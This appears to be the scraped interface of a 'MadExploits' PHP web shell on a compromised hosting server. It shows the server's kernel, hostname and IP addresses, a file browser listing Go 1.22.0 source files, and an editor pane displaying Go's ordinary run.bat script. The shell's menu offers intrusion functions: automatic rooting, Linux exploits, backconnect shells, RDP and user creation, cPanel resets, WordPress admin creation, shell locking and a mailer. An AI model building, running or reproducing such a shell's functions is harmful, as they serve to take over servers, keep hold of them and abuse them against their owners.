Linux id-dci-web1980.main-hosting.eu 5.14.0-611.26.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Jan 29 05:24:47 EST 2026 x86_64
LiteSpeed
: 153.92.8.146 | : 216.73.216.173
Cant Read [ /etc/named.conf ]
8.3.30
u610877233
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
opt /
golang /
1.22.0 /
src /
[ HOME SHELL ]
Name
Size
Permission
Action
archive
[ DIR ]
drwxr-xr-x
arena
[ DIR ]
drwxr-xr-x
bufio
[ DIR ]
drwxr-xr-x
builtin
[ DIR ]
drwxr-xr-x
bytes
[ DIR ]
drwxr-xr-x
cmd
[ DIR ]
drwxr-xr-x
cmp
[ DIR ]
drwxr-xr-x
compress
[ DIR ]
drwxr-xr-x
container
[ DIR ]
drwxr-xr-x
context
[ DIR ]
drwxr-xr-x
crypto
[ DIR ]
drwxr-xr-x
database
[ DIR ]
drwxr-xr-x
debug
[ DIR ]
drwxr-xr-x
embed
[ DIR ]
drwxr-xr-x
encoding
[ DIR ]
drwxr-xr-x
errors
[ DIR ]
drwxr-xr-x
expvar
[ DIR ]
drwxr-xr-x
flag
[ DIR ]
drwxr-xr-x
fmt
[ DIR ]
drwxr-xr-x
go
[ DIR ]
drwxr-xr-x
hash
[ DIR ]
drwxr-xr-x
html
[ DIR ]
drwxr-xr-x
image
[ DIR ]
drwxr-xr-x
index
[ DIR ]
drwxr-xr-x
internal
[ DIR ]
drwxr-xr-x
io
[ DIR ]
drwxr-xr-x
iter
[ DIR ]
drwxr-xr-x
log
[ DIR ]
drwxr-xr-x
maps
[ DIR ]
drwxr-xr-x
math
[ DIR ]
drwxr-xr-x
mime
[ DIR ]
drwxr-xr-x
net
[ DIR ]
drwxr-xr-x
os
[ DIR ]
drwxr-xr-x
path
[ DIR ]
drwxr-xr-x
plugin
[ DIR ]
drwxr-xr-x
reflect
[ DIR ]
drwxr-xr-x
regexp
[ DIR ]
drwxr-xr-x
runtime
[ DIR ]
drwxr-xr-x
slices
[ DIR ]
drwxr-xr-x
sort
[ DIR ]
drwxr-xr-x
strconv
[ DIR ]
drwxr-xr-x
strings
[ DIR ]
drwxr-xr-x
sync
[ DIR ]
drwxr-xr-x
syscall
[ DIR ]
drwxr-xr-x
testdata
[ DIR ]
drwxr-xr-x
testing
[ DIR ]
drwxr-xr-x
text
[ DIR ]
drwxr-xr-x
time
[ DIR ]
drwxr-xr-x
unicode
[ DIR ]
drwxr-xr-x
unsafe
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxr-xr-x
Make.dist
553
B
-rw-r--r--
README.vendor
2.11
KB
-rw-r--r--
all.bash
375
B
-rwxr-xr-x
all.bat
543
B
-rw-r--r--
all.rc
388
B
-rwxr-xr-x
bootstrap.bash
2.25
KB
-rwxr-xr-x
buildall.bash
2.07
KB
-rwxr-xr-x
clean.bash
518
B
-rwxr-xr-x
clean.bat
600
B
-rw-r--r--
clean.rc
380
B
-rwxr-xr-x
cmp.bash
1.46
KB
-rwxr-xr-x
go.mod
208
B
-rw-r--r--
go.sum
680
B
-rw-r--r--
make.bash
7.65
KB
-rwxr-xr-x
make.bat
6.37
KB
-rw-r--r--
make.rc
3.76
KB
-rwxr-xr-x
race.bash
919
B
-rwxr-xr-x
race.bat
1.07
KB
-rw-r--r--
run.bash
2.09
KB
-rwxr-xr-x
run.bat
859
B
-rw-r--r--
run.rc
406
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : run.bat
:: Copyright 2012 The Go Authors. All rights reserved. :: Use of this source code is governed by a BSD-style :: license that can be found in the LICENSE file. @echo off if exist ..\bin\go.exe goto ok echo Must run run.bat from Go src directory after installing cmd/go. goto fail :ok :: Keep environment variables within this script :: unless invoked with --no-local. if x%1==x--no-local goto nolocal if x%2==x--no-local goto nolocal setlocal :nolocal set GOBUILDFAIL=0 set GOENV=off ..\bin\go tool dist env > env.bat if errorlevel 1 goto fail call .\env.bat del env.bat set GOPATH=c:\nonexist-gopath if x%1==x--no-rebuild goto norebuild ..\bin\go tool dist test --rebuild if errorlevel 1 goto fail goto end :norebuild ..\bin\go tool dist test if errorlevel 1 goto fail goto end :fail set GOBUILDFAIL=1 :end
Close